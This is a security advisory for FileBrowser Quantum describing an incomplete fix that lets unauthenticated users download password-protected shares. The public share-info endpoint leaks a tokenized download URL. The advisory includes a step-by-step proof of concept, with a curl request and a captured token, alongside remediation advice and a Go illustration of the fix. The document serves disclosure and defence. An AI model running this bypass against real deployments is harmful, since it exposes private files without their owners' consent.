
Incomplete Remediation of CVE-2026-27611: Password-Protected Share Bypass via /public/api/share/info

High
gtsteffaniak published GHSA-525j-95gf-766f Mar 7, 2026

Package

FileBrowser Quantum

Affected versions

1.3.0-beta
1.2.1-stable

Patched versions

1.3.1-beta
1.2.2-stable

Description

Summary

The remediation for CVE-2026-27611 appears incomplete. Password-protected shares still disclose a tokenized downloadURL via /public/api/share/info in the docker image gtstef/filebrowser:1.3.1-webdav-2.

Details

The issue stems from two flaws:

  1. Tokenized download URLs are written into the persistent share model in backend/http/share.go, convertToFrontendShareResponse (line 63):
     s.DownloadURL = getShareURL(r, s.Hash, true, s.Token)

  2. The public endpoint GET /public/api/share/info returns shareLink.CommonShare without clearing DownloadURL.

Since Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.

The previous patch removed token generation in one handler but did not address the persisted DownloadURL values or the public reflection of existing DownloadURL values.

PoC

  1. Create a password-protected share as an authenticated user

  2. Copy the public share URL (the clipboard WITHOUT an arrow)
    http://yourdomain/public/share/yoursharedhash
    Example:
    http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw

  3. Query the public share endpoint with a curl request:
    curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*'
    Example:
    curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*'

    Response includes:

    {
        "shareTheme": "default",
        "title": "Shared files - test.md",
        "description": "A share has been sent to you to view or download.",
        "disableSidebar": false,
        "downloadURL": "http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D",
        "shareURL": "http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw",
        "enforceDarkLightMode": "default",
        "viewMode": "normal",
        "shareType": "normal",
        "sidebarLinks": [
            {
                "name": "Share QR Code and Info",
                "category": "shareInfo",
                "target": "#",
                "icon": "qr_code"
            },
            {
                "name": "Download",
                "category": "download",
                "target": "#",
                "icon": "download"
            },
            {
                "name": "sourceLocation",
                "category": "custom",
                "target": "/srv/test.md",
                "icon": ""
            }
        ],
        "hasPassword": true,
        "disableLoginOption": false,
        "sourceURL": "/srv/test.md"
    }
    

Note that the response contains "hasPassword": true and the downloadURL includes a token= parameter.

  4. Take the downloadURL (from the JSON response), replace \u0026 with &, and open the link in an incognito or private browser window so that cookies do not interfere
    Example:
    http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D

The browser downloads the file immediately without requiring the password.

Impact

An unauthenticated attacker can retrieve password-protected shared files without the password.
This results in authentication bypass, unauthorized file access and a confidentiality compromise.

Recommended Remediation

Sanitize DownloadURL in public share info responses by setting commonShare.DownloadURL = "" before returning the JSON response in the shareInfoHandler method located in backend/share.go.

Structural fix: only generate tokenized URLs after successful password validation.
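The following Go program is an added illustration of both remediation options against the two flaws described under Details; it is not code from the FileBrowser Quantum project. The CommonShare and storedShare types, buildDownloadURL (standing in for getShareURL with the token argument set), publicShareInfo, downloadURLAfterPassword and the leaksToken regression check are all hypothetical names, and the hash, token and password values are constructed. publicShareInfo shows the response-side fix (clearing DownloadURL before serialization, so a stale persisted value cannot be reflected), downloadURLAfterPassword shows the structural fix (no tokenized URL is minted until the password validates), and leaksToken is the check a maintainer can run over a public share-info body to confirm the issue does not regress.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// CommonShare is a hypothetical stand-in for the share model the public
// share-info endpoint serializes; field names follow the JSON in the advisory.
type CommonShare struct {
	Hash        string `json:"hash"`
	Title       string `json:"title"`
	DownloadURL string `json:"downloadURL"`
	ShareURL    string `json:"shareURL"`
	HasPassword bool   `json:"hasPassword"`
}

// storedShare models the persisted record, which (per the advisory) still
// carries the download token and may carry a tokenized DownloadURL.
type storedShare struct {
	CommonShare
	Token        string
	PasswordHash [32]byte // constructed: SHA-256 of the share password
}

func hashPassword(pw string) [32]byte { return sha256.Sum256([]byte(pw)) }

// buildDownloadURL plays the role of getShareURL(..., true, token): the one
// place a bearer token is written into a URL.
func buildDownloadURL(base, hash, token string) string {
	q := url.Values{}
	q.Set("hash", hash)
	q.Set("token", token)
	return base + "/public/api/resources/download?" + q.Encode()
}

// publicShareInfo is the hardened public response: any persisted tokenized
// DownloadURL is cleared before serialization (the commonShare.DownloadURL = ""
// fix the advisory recommends), whatever the stored value happens to be.
func publicShareInfo(s storedShare) CommonShare {
	out := s.CommonShare
	out.DownloadURL = ""
	return out
}

// downloadURLAfterPassword is the structural fix: a tokenized URL is only
// minted once the share password has been validated (constant-time compare).
func downloadURLAfterPassword(base string, s storedShare, password string) (string, error) {
	if s.HasPassword {
		got := hashPassword(password)
		if subtle.ConstantTimeCompare(got[:], s.PasswordHash[:]) != 1 {
			return "", errors.New("invalid share password")
		}
	}
	return buildDownloadURL(base, s.Hash, s.Token), nil
}

// leaksToken is a regression check for this advisory: it reports true when a
// public share-info JSON body describes a password-protected share whose
// downloadURL still carries a token= query parameter.
func leaksToken(body []byte) (bool, error) {
	var resp struct {
		DownloadURL string `json:"downloadURL"`
		HasPassword bool   `json:"hasPassword"`
	}
	if err := json.Unmarshal(body, &resp); err != nil {
		return false, err
	}
	if !resp.HasPassword || resp.DownloadURL == "" {
		return false, nil
	}
	u, err := url.Parse(resp.DownloadURL)
	if err != nil {
		return false, err
	}
	return u.Query().Get("token") != "", nil
}

func main() {
	const base = "http://yourdomain" // constructed host, as in the advisory
	s := storedShare{
		CommonShare:  CommonShare{Hash: "EXAMPLE-HASH", Title: "Shared files - test.md", HasPassword: true},
		Token:        "EXAMPLE-TOKEN",
		PasswordHash: hashPassword("correct horse"),
	}
	s.ShareURL = base + "/public/share/" + s.Hash
	s.DownloadURL = buildDownloadURL(base, s.Hash, s.Token) // the persisted value the advisory describes

	before, _ := json.Marshal(s.CommonShare)   // what the unfixed endpoint would return
	after, _ := json.Marshal(publicShareInfo(s)) // hardened response
	leakBefore, _ := leaksToken(before)
	leakAfter, _ := leaksToken(after)
	fmt.Println("token leaks before fix:", leakBefore, "| after fix:", leakAfter)

	if _, err := downloadURLAfterPassword(base, s, "wrong"); err != nil {
		fmt.Println("wrong password:", err)
	}
	u, _ := downloadURLAfterPassword(base, s, "correct horse")
	fmt.Println("tokenized URL issued after password check:", strings.Contains(u, "token="))
}
```

encoding/json escapes & as \u0026 in string values, which is why the advisory's captured response shows that sequence; leaksToken parses the body rather than string-matching, so it sees the decoded URL either way.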

Severity

High


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID

CVE-2026-30933

Weaknesses

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Missing Authentication for Critical Function

The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.

Client-Side Enforcement of Server-Side Security

The product is composed of a server that relies on the client to implement a mechanism that is intended to protect the server.

Credits